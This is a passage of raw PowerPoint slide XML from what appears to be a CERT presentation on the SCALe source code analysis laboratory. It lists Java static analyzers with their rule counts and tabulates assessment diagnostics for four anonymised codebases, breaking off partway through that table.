                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t> Coding Filters</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1154928373"/>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SCALe Demo Videos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>David Svoboda narrates a series of videos demonstrating the Source Code Analysis Laboratory (SCALe)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Available as a YouTube playlist:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.cert.org/secure-coding/products-services/scale.cfm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.youtube.com/playlist?list=PLSNlEg26NNpxMofZSX-72rxjFEUk9myk-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2421954476"/>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Coverage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931785096"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304800" y="1676400"/>
          <a:ext cx="8153400" cy="1920240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2717800"/>
                <a:gridCol w="2717800"/>
                <a:gridCol w="2717800"/>
              </a:tblGrid>
              <a:tr h="152400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Java Analyzer</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Version</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Number Of Rules</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="457200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>Coverity</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>6.5.3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>35</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="152400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>FindBugs</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>2.0.3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>44</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Fortify</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>5.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>26</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="350520">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Eclipse</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>4.3.2 (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>kepler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49782242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 SCALe Java Assessments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94359932"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="381003" y="1371600"/>
          <a:ext cx="8153400" cy="2727960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{00A15C55-8517-42AA-B614-E9B94910E393}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1066797"/>
                <a:gridCol w="971553"/>
                <a:gridCol w="1019175"/>
                <a:gridCol w="1019175"/>
                <a:gridCol w="1019175"/>
                <a:gridCol w="1019175"/>
                <a:gridCol w="1019175"/>
                <a:gridCol w="1019175"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Codebase </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Date </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>KSigLOC</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Rules</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Violated </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Diags</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>True</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Suspect </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Diags</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                        <a:t> /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>KSigLOC</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>A</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>6/12</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>4.3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>18</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>345 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>117 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>228 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>80.8</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="355600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>B</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>9/12</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>61.2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>33</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>538 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>288 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>250 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>8.8 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>C</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>11/13</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>17.6</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>21</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>414 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>341 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>73 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>23.5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>D</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>2/14</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>653.0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="006600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="006600"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>29</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>8,526 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
